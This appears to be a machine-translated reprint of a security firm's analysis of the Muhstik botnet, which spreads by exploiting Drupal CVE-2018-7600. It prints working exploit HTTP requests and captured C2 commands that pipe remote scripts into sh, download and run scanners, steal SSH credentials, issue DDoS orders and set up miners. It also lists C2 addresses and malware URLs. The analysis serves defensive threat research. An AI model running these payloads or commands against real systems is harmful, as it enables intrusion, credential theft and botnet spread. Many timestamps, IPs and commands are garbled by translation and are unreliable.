Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how botnet Muhstik uses Drupal loophole CVE-2018-7600 worm transmission, many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

On March 28, 2018, Drupal.org announced a fix for vulnerability CVE-2018-7600. Drapal is an open source content management system written in the PHP language. Many websites use Drupal to provide web services. This vulnerability exists in multiple versions of Drupal and can be exploited by an attacker to take full control of the website. Since April 13, 2018, 360 Cyber Security Research Institute has observed a large number of scans for this vulnerability on the Internet. Through analysis, we believe that at least three groups of malware are exploiting this vulnerability to spread. One group of malware has worm propagation behavior, and the amount of infection is significantly higher than other malware. After analysis, we think that this is a long-standing botnet family. We named it muhstik, mainly because it contains this string in many places in its binary file name and communication protocol. We believe that muhstik has the following characteristics that deserve the attention of the community:

Worm propagation

Long-term existence

A large number of vulnerabilities are used.

Mixed use of various profit-making methods

Attack load

In chronological order, Muhstik uses the following two sets of attack payloads, which account for about 80% of all seen payloads and are the main part of the attacks we see:

# 1 active time: 2018-04-1403 Suzhou 3336 ~ 2018-04-17 15:40:58

# 2 active time: 2018-04-16 19V 38RV 39 ~ so far

The IP addresses of the corresponding attack sources are very scattered, and basically all of them are running Drupal programs. The attack source itself is the easy infection target of the attack load, which is an important indicator of worm spread and arouses our vigilance. The details of the two sets of attack payloads are as follows:

POST / user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Cache-Control: no-cache Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64 X64) Host: {target} Content-Type: application/x-www-form-urlencoded Content-length: 2048 form_id=user_register_form&_drupal_ajax=1&mail [# post_render [] = exec&mail [# type] = markup&mail [# markup] = echo "team6 representing 73de29021fd0d8d2cfd204d2d955a46d" | tee t6nvPOST / user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Cache-Control: no-cache Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64 X64) Host: {target} Content-Type: application/x-www-form-urlencoded Content-length: 170form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php sample aiox86 caused the above attack payload # 2

There are the following key samples

Da17dc1438bb039968a5737c6fbc88cd aiox86

We believe that the above sample aiox86 and its associated samples generate the aforementioned attack payload:

# 2 attack payload, which exists in this sample

The attack load of # 1 is very similar to that of # 2, and we think it should be generated by the relevant samples of this sample.

In fact, the scanning behavior of this sample is already quite complex, much more than the scanning for drupal vulnerabilities mentioned above:

Scan the target IP address: the target IP address is obtained from the remote server 191.238.234.227, so that the attacker can have more flexible control over the target

Delivery vulnerability load: not only limited to Drupal, but also includes 6 other vulnerability loads

Scan target ports: not only TCP 80, but also TCP ports 8080, 7001, 2004; several different loads will be tried on each port

Scan result report: after the load is implanted successfully, the remote server 51.254.219.134 will be visited and reported, and different loads will access different URL. In this way, attackers can easily identify the victim's weaknesses.

Get the IP address of the scan target:

Hxxp://191.238.234.227/amazon.php # We tried to get 50 network segments from this URL, all of which belong to Amazon hxxp://191.238.234.227/dedi.php # We tried to get 50 network segments from this URL, belonging to relatively scattered companies

Loophole load delivered:

ClipBucket:rss.php DasanNetwork Solution:/cgi-bin/index.cgi Drupal:CVE-2018-7600 WebDav Weblogic:CVE-2017-10271 Webuzo:install.php Wordpress:install.php

Scan the correspondence between the target port and the load:

80:Weblogic,Wordpress,Drupal,WebDav,ClipBucket 2004:Webuzo 7001:Weblogic 8080:Wordpress,WebDav,DasanNetwork Solution

Load reporting information interface:

Hxxp://51.254.219.134/clipbucket.php # ClipBucket hxxp://51.254.219.134/dasan.php # DasanNetwork_Solution hxxp://51.254.219.134/dav.php # Webdav hxxp://51.254.219.134/drupal.php # Drupal hxxp://51.254.219.134/oracleaudit.php?port= # Weblogic hxxp://51.254.219.134/tomato.php # http401 Used to detect intermediate state hxxp://51.254.219.134/webuzo.php # Webuzo hxxp://51.254.219.134/wp.php # Wordpress sample aiox86 is distributed by the Muhstik botnet

At the 360 Network Security Research Institute, we continuously monitor many botnet attack instructions. This time, we found that the 139.99.101.96 9090 control server, around 04:04 on 2018-04-19, distributed the sample aiox86 with the following instructions:

The above C2 belongs to the Muhstik botnet family.

Muhstik botnet family

Muhstik is a variant of the Tsunami botnet and its features include:

Representative sample: c37016e34304ff4a2a0db1894cdcdb92

C2 server: a total of 11 domain names / IP addresses, all of which are 9090. We guess this is for load balancing.

Communication protocol: based on IRC service protocol, different instructions are sent through different Channel

IRC Channel: we have observed multiple IRC Channel, all starting with muhstik. At present, we do not fully confirm which Channle is enabled on each C2 server, which is determined by the characteristics of the IRC protocol itself. Only when we receive the communication instructions in the corresponding Channel can we confirm that the attacker activated the Channel on the server.

The structure of the Muhstik botnet is already quite complex. As mentioned earlier, 11 C2 domain names / IP are hard-coded in the sample. In addition, it spreads and makes profits in a variety of ways. Communication module of Muhstik:

Aioscan scanning module: as mentioned earlier, this scanning module contains six scanning loads on four ports.

SSH scanning module: weak password scanning

How Muhstik makes a profit:

Xmrig mining: digging XMR digital tokens, the corresponding mine pool address is 147.135.208.145 4871, self-built mining pool.

Cgminer mining: BTC digital tokens are excavated, multiple mining pools are used, and the user name is reb0rn.D3

DDoS attack: we intercepted a number of attack instructions against 46.243.189.102 during the 2018-04-19 day 07VR 2007VR 40. (we didn't see this attack on our DDoSMon.net, but we saw multiple attacks against the IP address earlier.)

Muhstik cgminer wallet and mine pool address:

{"url": "stratum+tcp://dash.viabtc.com:443", "user": "reb0rn.D3", "pass": "x"}, {"url": "stratum+tcp://dash.viabtc.com:443", "user": "reb0rn.D3", "pass": "x"}, {"url": "stratum+tcp://dash.viabtc.com:443" "user": "reb0rn.D3", "pass": "x"}

Muhstik C2 list, in the order in which it is hard-coded in the sample:

139.99.101.96 AS16276 OVH SAS 144.217.84.99 AS16276 OVH SAS 145.239.84.0 AS16276 OVH SAS 147.135.210.184 AS16276 OVH SAS 142.43.168 AS16276 OVH SAS 192.99.71.250 AS16276 OVH SAS 9090 AS16276 OVH SAS 142.44.240.149090 AS16276 OVH SAS 121.128.171.449090 AS4766 Korea Telecom # is not currently in force : 9090 AS16276 OVH SAS # is not currently valid 145.239.93.125 9090 AS16276 OVH SAS irc.de-zahlung.eu:9090 # is not currently valid

IRC Channel, alphabetical order:

# muhstik#muhstik-i586#muhstik-SSH#muhstik-x86

When we monitor these IRC Channel, we get a number of instructions, some of which are as follows, as shown in the screenshot below:

# muhstik-x86 # implant xmrig64 mining program; # muhstik-x86 # implant Muhstik.aioscan scanning module # muhstik-x86 # detect the presence of drupal in bot # muhstik # implant Muhstik.aioscan scanning module # muhstik # issue DDoS attack instruction; # muhstik-SSH # configuration file of cgminer mining program # muhstik-SSH # perform SSH scan # muhstik-SSH # steal locally saved ssh credentials, further scale out, and deliver itself to achieve worm propagation # muhstik-i586 # implant Muhstik.aioscan#muhstik-i586 # implant xmrig32 mining program

# muhstik-x86 # implant xmrig64 mining program

: timers clicked localhost PRIVMSG # muhstik-x86:! * SH curl http://104.236.26.43/muhstik.sh | sh > / dev/null 2 > & 1 &: timers clicked localhost PRIVMSG # muhstik-x86:! * SH wget-qO-http://104.236.26.43/muhstik.sh | sh > / dev/null 2 > & 1 &

# muhstik-x86 # implant Muhstik.aioscan scanning module

: timers clicked localhost PRIVMSG # muhstik-x86:! X* SH (wget-c http://191.238.234.227/x/aiox86-O / tmp/aiox86; chmod + x / tmp/aiox86) > / dev/null 2 > & 1: timers cliched localhost PRIVMSG # muhstik-x86:! x* SH / tmp/aiox86 amazon > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik-x86:! x* SH / tmp/aiox86 dedi > / dev/null 2 > & 1 &

# muhstik-x86 # detect whether drupal exists in bot

: SH (wc-l autoload.php & & echo $(hostname-I | cut-d ""-f 1)): muhstik-x86:! * SH (wc-l autoload.php & & echo $(hostname-I | cut-d "- f 1)) | | echo" No drupal ": null PRIVMSG # muhstik-x86:! * SH (wc-l autoload.php | grep 17 & echo) | $(hostname-I | cut-d ""-f 1)): muhstik-x86: (wc-l autoload.php & & echo $(hostname-I | cut-d ""-f 1)) | | echo "No drupal"

# muhstik # implant Muhstik.aioscan scanning module

: timersclones localhost PRIVMSG # muhstik:! a * SH / tmp/aioarm amazon > / dev/null 2 > & 1 &: timersclones localhost PRIVMSG # muhstik:! a * SH / tmp/aioarm dedi > / dev/null 2 > & 1 &: timers cliches localhost PRIVMSG # muhstik:! a * SH (wget-c localhost-O / tmp/aioarm) Chmod + x / tmp/aioarm) > / dev/null 2 > & 1 &: SH / tmp/aiomipsel amazon > / dev/null 2 > muhstik:! Mps | * SH / tmp/aiomipsel amazon > / localhost PRIVMSG # muhstik:! Mps | * SH / tmp/aiomipsel dedi > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! Mps | * SH (wget-c localhost-O / tmp/aiomipsel Chmod + x / tmp/aiomipsel) > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! M | * SH / tmp/aiomips amazon > / dev/null 2 > & 1 &: timersclicklocalhost PRIVMSG # muhstik:! M | * SH / tmp/aiomips dedi > / dev/null 2 > & 1 &: timersclicklocalhost PRIVMSG # muhstik:! M | * SH (wget-c localhost-O / tmp/aiomips) Chmod + x / tmp/aiomips) > / dev/null 2 > & 1 &: timesclicklocalhost PRIVMSG # muhstik:! PPC | * SH / tmp/aioppc amazon > / dev/null 2 > & 1 &: timersclones localhost PRIVMSG # muhstik:! PPC | * SH / tmp/aioppc dedi > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! PPC | * SH (wget-c localhost-O / tmp/aioppc; chmod + x / tmp/aioppc) > / dev/null 2 > & 1 &

# muhstik # issue DDoS attack instructions

: * STD 46.243.189.102! * STD 46.243.189.102 60 XXXXXXX STD TIMERSclad localhost PRIVMSG # muhstik:! * | * 0 | * STD 46.243.189.127 30 XXXXVlTIMERSclad localhost PRIVMSG # muhstik:! * | * 1 | * STD 46.243.189.102 30 xxxxmm TIMERSclad localhost PRIVMSG # muhstik:! * | * 2 | * STD 46.243.189.102 30 XXXXVERSclad localhost PRIVMSG # muhstik: ! * | * 3 | * STD 46.243.189.102 127 30 XXXXV Timersclad localhost PRIVMSG # muhstik:! * | * 4 | * STD 46.243.189.102 127 30 XXXXV TIMERSclad localhost PRIVMSG # muhstik:! * | * 5 | * STD 46.243.189.102 127 30 XXXXXX TIMERSclad localhost PRIVMSG # muhstik:! * | * 6 | * STD 46.243.189.102 30 XXXXXX timesclad localhost PRIVMSG # muhstik:! * | | | * 7 | * STD 46.243.189.102 127 30 xxxxxxxv STD 46.243.189.102 30 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmxxxxxxxxxxxxxxxxxxx | * STD 46.243.189.102 PRIVMSG # muhstik:! * | * 9 | * STD 46.243.189.102 30 XXXX |

# muhstik-SSH # configuration file of cgminer mining program

: timesclad localhost PRIVMSG # muhstik-ssh:! * SH tail-N1 / usr/bin/compile_time | grep D3 & & (wget-qO-http://51.254.221.129/cgminer.x11.conf > / config/cgminer.conf & & / etc/init.d/cgminer.sh restart) > / dev/null 2 > & &: timesclad localhost PRIVMSG # muhstik-ssh:! * SH tail-N1 / usr/bin/compile_time | grep L3 & & (wget- QO-http://51.254.221.129/cgminer.scrypt.conf > / config/cgminer.conf & & / etc/init.d/cgminer.sh restart) > / dev/null 2 > & 1 &: timers clicked localhost PRIVMSG # muhstik-ssh:! * SH tail-N1 / usr/bin/compile_time | grep S4 & & (cgminer-api "addpool | stratum+tcp://bch.viabtc.com:443 Reborn.api,x "& & cgminer-api" switchpool | 3 ") > / dev/null 2 > & 1 &: timers clicked localhost PRIVMSG # muhstik-ssh:! * SH tail-N1 / usr/bin/compile_time | grep S5 & & (cgminer-api" addpool | stratum+tcp://bch.viabtc.com:443,reborn.api X "& & cgminer-api" switchpool | 3 ") > / dev/null 2 > & 1 &: timers clicked localhost PRIVMSG # muhstik-ssh:! * SH tail-N1 / usr/bin/compile_time | grep S7 & & (wget-qO-http://51.254.221.129/cgminer.sha256.conf > / config/cgminer.conf & & / etc/init.d/cgminer.sh restart) > / dev/null 2 > & 1 &

# muhstik-SSH # steal locally saved ssh credentials, further scale out, deliver itself, and achieve worm propagation

: PRIVMSG # muhstik-ssh:! * SH wget-qO-http://121.127.216.91/multiply/wp-content/plugins/all-in-one-wp-migration/t6ssh | sh > / dev/null 2 > & 1 &

# muhstik-SSH # perform SSH scan

:! * SSH 10025 54.39.23.28 51.254.219.137 SSH 1010100 25 54.39.23.28 51.2519.137 muhstik-ssh:! * SSH 1010100 25 54.39.23.28 51.254.219.137muhstik-ssh:! * SSH 10210054.39.23.28 51.254.219.137 SSH 101010025 54.39.23.28 51.254.219.137 SSH 103100 25 54.39.28 51.254.219.137 28 51.254.219.137 SSH 1010 25 54.39.23.28 51.254.219.137 SSH 10410 25 54.39.23 28 51.254.219.137 SSH 106100 25 54.39.28 muhstik-ssh:! * SSH 107100 25 54.39.28 localhost PRIVMSG # muhstik-ssh:! * SSH 107100 25 54.39.23.28 51.254.219.137RM Timersclad localhost PRIVMSG # muhstik-ssh:! * SSH ! * SSH 110100 25 54.39.23.28 51.254.219.137 SSH 100 25 54.39.28 51.254.219.137 SSH 110100 25 54.39.28 51.254.219.137 muhstik-ssh:! * SSH 111100 25 54.39.28 51.254.219.137TIMERSclad localhost PRIVMSG # muhstik-ssh:! * SSH 112100 25 54.39.28 51.254.219.137 Muhstik-ssh:! * SSH 113100 25 54.39.23.28 51.254.219.137 SSH 114100 25 54.39.23.28 51.254.219.137 SSH 114100 25 54.39.23.28 51.254.219.137 SSH 118100 25 54.39.28 51.254.219.137 SSH 114100 25 54.39.28 51.254.219.137 SSH 114100 25 54.39.28 51.254.219.137

# muhstik-i586 # implant Muhstik.aioscan

: timersplaying localhost PRIVMSG # muhstik-i586:! I * SH (wget-c http://191.238.234.227/x/aioi586-O / tmp/aioi586; chmod + x / tmp/aioi586) > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik-i586:! I * SH / tmp/aioi586 amazon > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik-i586:! I * SH / tmp/aioi586 dedi > / dev/null 2 > & 1 &

# muhstik-i586 # implant xmrig32 mining program

: timers clicked localhost PRIVMSG # muhstik-i586:! * SH wget-qO-http://104.236.26.43/xmrt32.sh | sh > / dev/null 2 > & 1 &: timers clicked localhost PRIVMSG # muhstik-i586:! * SH curl http://104.236.26.43/xmrt32.sh | sh > / dev/null 2 > & 1 & Muhstik may have been originated for a long time

By tracing the history of Muhstik-related domain names, we find that Muhstik has a long history and has a strong relationship with the following domain names.

Dasan.deutschland-zahlung.eu 134.ip-51-254-219.eu uranus.kei.su wireless.kei.su www.kei.su y.fd6fq54s6df541q23sdxfg.euIoC

Muhstik C2 List

139.99.101.96 AS16276 OVH SAS 144.217.84.99 AS16276 OVH SAS 145.239.84.0 AS16276 OVH SAS 147.135.210.184 AS16276 OVH SAS 142.43.168 AS16276 OVH SAS 192.99.71.250 AS16276 OVH SAS 9090 AS16276 OVH SAS 142.44.240.149090 AS16276 OVH SAS 121.128.171.449090 AS4766 Korea Telecom # is not currently in force : 9090 AS16276 OVH SAS # is not currently valid 145.239.93.125 9090 AS16276 OVH SAS irc.de-zahlung.eu:9090 # is not currently valid

Muhstik Malware URL

Hxxp://51.254.221.129/c/cron hxxp://51.254.221.129/c/tfti hxxp://51.254.221.129/c/pftp hxxp://51.254.221.129/c/ntpd hxxp://51.254.221.129/c/sshd hxxp://51.254.221.129/c/bash hxxp://51.254.221.129/c/pty hxxp://51.254.221.129/c/shy Hxxp://51.254.221.129/c/nsshtfti hxxp://51.254.221.129/c/nsshcron hxxp://51.254.221.129/c/nsshpftp hxxp://51.254.221.129/c/fbsd hxxp://191.238.234.227/x/aiox86

Muhstik Malware MD5

C37016e34304ff4a2a0db1894cdcdb92 # Muhstik sample module da17dc1438bb039968a5737c6fbc88cd # Muhstik scanning module after reading the above, do you have any further understanding of how botnet Muhstik exploits Drupal vulnerability CVE-2018-7600 worm propagation? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.